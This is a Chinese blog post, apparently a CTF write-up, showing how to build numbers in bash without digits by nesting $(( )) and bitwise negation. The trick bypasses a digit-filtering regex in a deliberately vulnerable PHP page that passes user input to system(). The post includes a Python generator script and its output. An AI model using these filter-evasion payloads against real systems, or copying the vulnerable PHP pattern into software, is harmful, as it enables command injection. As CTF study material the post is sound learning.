关于linux中构造无符号数字

最新推荐文章于 2024-07-16 12:57:18 发布
最新推荐文章于 2024-07-16 12:57:18 发布
阅读量241 收藏 1
点赞数 1
文章标签: linux python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49434527/article/details/128050099
版权

在CTF中时常遇到过滤数字这种情况那么我们就可以采用构造无参数数字利用自反原理

例如一下例题

<?php

// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

我们如何快速构造自己想要的数字呢?

直接上脚本

import os.path
def mult_times(str, m, n):
    front_len = m
    if front_len > len(str):
        front_len = len(str)
    front = str[:front_len]

    result = ''
    for i in range(n):
        result = result + front
    return result
# 构造参数
print("提示:$((${_}))=0,$((~$((${_}))))=-1")
print("请输入你要构造的数字")
n = int(input("构造的数字:"))
yuanshi=mult_times('$((~$(())))', 11, n+1)
fushu=mult_times('$((~$(())))', 11, n)
print("原始数据:",yuanshi)
q='~$(('
p='))'
print('第一次取反结果为:')
print(q+yuanshi+p)
FSQF=(q+fushu+p)
b='$((~$(('
c='))))'
ZX='echo'
end=(ZX+" "+b+yuanshi+c)
FSQF2=ZX+" "+q+fushu+p
print('最后构造正数结果为:')
print(end)
print('最后构造负数结果为:')
print(FSQF2)
# 结果写入
current_path = os.getcwd()
file_path = os.path.join(current_path, 'RCE.sh')
file_test = open(file_path, 'w+', encoding='utf-8')
file_test.write(end)
file_test.close()
current_path = os.getcwd()
file_path = os.path.join(current_path, 'RCE2.sh')
file_test = open(file_path, 'w+', encoding='utf-8')
file_test.write(FSQF2)
file_test.close()
# 进行判断
print("判断有效!输出正数数字为:")
os.system("chmod +x RCE.sh;bash RCE.sh")
print("判断有效!输出负数数字为:")
os.system("chmod +x RCE.sh;bash RCE2.sh")

运行结果如下

提示:$((${_}))=0,$((~$((${_}))))=-1
请输入你要构造的数字
构造的数字:66
原始数据: $((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))
第一次取反结果为:
~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))
最后构造正数结果为:
echo $((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
最后构造负数结果为:
echo ~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))
判断有效!输出正数数字为:
66
判断有效!输出负数数字为:
~-66

最后附上截图

 

Fright_Moch
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS6.0文件解析漏洞exp
Fright-Moch的博客
04-18 186
【代码】IIS6.0文件解析漏洞exp。
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1680
过滤了flag可以用*或者?绕过。
Nmap网络扫描器实验
Fright-Moch的博客
05-09 7007
网络入侵的一般流程是确定目标、信息收集、漏洞挖掘、实施攻击、留下后门、清除日志。在信息收集环节又可分为网络踩点、网络扫描和网络查点。在网络扫描部分,按照攻击者的入侵流程又可分为主机扫描、端口扫描、系统类型探测和漏洞扫描。 网络扫描是针对整个目标网络或单台主机,网络扫描可以全面、快速、准确的获取目标系统的信息;通过网络扫描发现对方,获取对方的信息是进行网络攻防的前提。至今,互联网上有许多开源的优秀网络扫描工具,Nmap(简称Network Mapper)就是世界上最流行功能、最强大的网络扫描工具。
ctfshow web入门 命令执行2(52~77)(含总结)
m0_61448651的博客
01-16 1234
ctfshow web入门命令执行2(52~77)(含总结)
PHP正则表达式
黄啊码
03-26 623
验证邮箱格式 复制代码 // 验证邮箱格式 function checkEmail($email) { if (!preg_match("/([\w\-]+\@[\w\-]+\.[\w\-]+)/", $email)) { return false; } else { return true; } } 复制代码 验证 URL 复制代码 //...
sed命令详解.docx
01-03
**sed命令详解** **1. sed命令的基本概念** sed(stream editor)是一个强大的文本处理...通过熟练掌握sed的使用,可以方便地进行文本过滤、替换、插入等任务,尤其在Linux系统,它是不可或缺的文本处理工具之一。
SHT30-SHT31温湿度传感器驱动代码
12-19
3. **数据校验**:传感器返回的数据通常包含温度和湿度的16位无符号整数值,但为了确保数据的准确性,需要进行CRC(循环冗余校验)或其他校验算法的检查。 4. **温度和湿度计算**:传感器返回的是原始数字值,需要...
2022年PHP基础知识点.doc
11-11
* PHP 属于 B/S 构造:PHP 是一个服务器端脚本语言,运行在服务器端,生成动态的超文本,并将其发送到客户端的浏览器。 二、HTTP 协议 * HTTP 协议简介:HTTP 是超文本传播协议,用于在互联网上传输超文本数据。...
2021-2022计算机二级等级考试试题及答案No.14670.docx
10-28
6. **构造函数**:在面向对象编程,每个类都至少有一个构造函数,即使没有显式定义,编译器也会提供一个默认的无参构造函数。 7. **数据库关系模型**:表E的键(码)通常由关联的两个表的主键组成,所以在这里,...
Python语法快速入门指南
09-21
Python,单行注释使用井号(#)开始,从该符号到行尾的所有内容都被视为注释。例如: ```python # 这是一个单行注释 ``` Python也支持多行注释,通常使用三个单引号或三个双引号包围多行文本: ```python ''' ...
命令执行各种姿势总结
weixin_48427966的博客
04-24 969
一、绕过if(!eval($c);web30。
无字母命令执行
WHQ556677的博客
12-30 1166
先看一道题 <?php error_reporting(0); show_source(__FILE__); if (isset($_GET['a'])) { $c=$_GET['a']; if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) { system($c); }else { echo "hacker!"; } } ?> 代码审计 过滤了字母
基于数据挖掘的入侵检测系统实验
Fright-Moch的博客
05-09 2481
数据挖掘算法可以挖掘隐藏于大数据的信息。入侵数据也具有大数据的特点,数据挖掘的许多方法可以应用于入侵检测,如聚类、分类、关联分析、序列分析方法。 “物以类聚,人与群分”即为聚类的通俗理解。聚类将数据按相似性的原则进行分类,分类后的类别称为簇;每个簇内有很大的相似性,而不同簇之间有很大的相异性。聚类是将物理或抽象对象的集合划分成多个类的过程,每一类都由相似的对象组成。聚类分析也是无监督学习的过程;与分类不同,在学习的过程不依赖于预先定义的类或带类标记的训练集,而是通过自身算法进行分
ctfshow WEB入门系列 之 命令执行1-10 (web29-39)
qq_43200143的博客
03-02 719
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } get传递参数c 执行命令。 c不能含有flag。 先ls一下看看有啥 ?c=system(ls); 直接上通配符解决吧 1.?c=syste...
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2538
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
ctfshow命令执行之无数字字母
HoAd'blog
01-28 3425
命令执行-无数字字母getshell前言一、无字母命令执行二、无字母数字命令执行总结 前言 做ctfshow的时候,碰到命令执行的题,发现这两种类型的题很有趣,学到了很多知识。 前置知识: shell下可以利用.来执行任意脚本 Linux文件名支持用glob通配符代替 一、无字母命令执行 方法1 异或:在PHP,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。 方法2 取反:将汉字(%ff%ff%ff)的某个字符取出来,来进行取反
linux有符号和无符号,有符号数和无符号
weixin_33595018的博客
05-15 127
该楼层疑似违规已被系统折叠隐藏此楼查看此楼学习了二进制数据,我们知道,在计算机系统,存储的任何数据都是以二进制数据的格式存储。存储数据的最小单位是字节(Byte),一个字节的容量是八位(bit),可以存储8个二进制数据。在讲解“有符号数”和“无符号数”之前,我们先来举一个例子。例如,有个人(称呼A)去爬山,半路上碰到朋友,朋友送了他一瓶水,此时A手上拥有一瓶水;那么,如果A觉得渴了,那他就把这...
linux按文内容长度分隔符,Linux – 按名称的一部分对文件进行排序(无分隔符)
weixin_33561009的博客
05-07 135
我想得到一个排序的文件列表.文件具有以下命名约定:DATENUMBER.txt(不含空格).例如,2015-12-09的文件3如下:201512093.txtls的版本排序选项对我没有帮助:ls -v:201512183.txt201512184.txt201512188.txt201512191.txt201512195.txt201512199.txt2015121810.txt2015121...
LINUX:懒汉单例模式线程池
最新发布
W2155的博客
07-16 446
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Linux 的特殊符号
05-21
Linux 有许多特殊符号,以下是一些常见的: 1. `~`:表示当前用户的主目录。 2. `.`:表示当前目录。 3. `..`:表示上级目录。 4. `/`:表示根目录。 5. `*`:通配符,表示任意个任意字符。 6. `?`:通配符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值